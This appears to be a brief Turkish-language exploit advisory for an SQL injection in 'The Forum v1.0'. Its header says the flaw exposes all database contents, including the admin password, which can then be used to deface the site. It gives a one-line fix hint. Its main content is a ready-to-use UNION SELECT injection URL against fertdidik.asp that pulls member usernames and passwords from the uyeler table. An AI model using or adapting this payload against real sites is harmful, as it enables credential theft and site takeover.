< ------------------- header data start ------------------- >

#############################################################

# Application Name : The Forum v1.0

# Vulnerable Type : SQL Injection

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : Fixlemek için id degerini alfanumerik karakterlerden arindirmak gerekiyor.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

fertdidik.asp?uyeno=7+union+select+1,kadi,sifre,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+uyeler+where+uyeno=7

< -- bug code end of -- >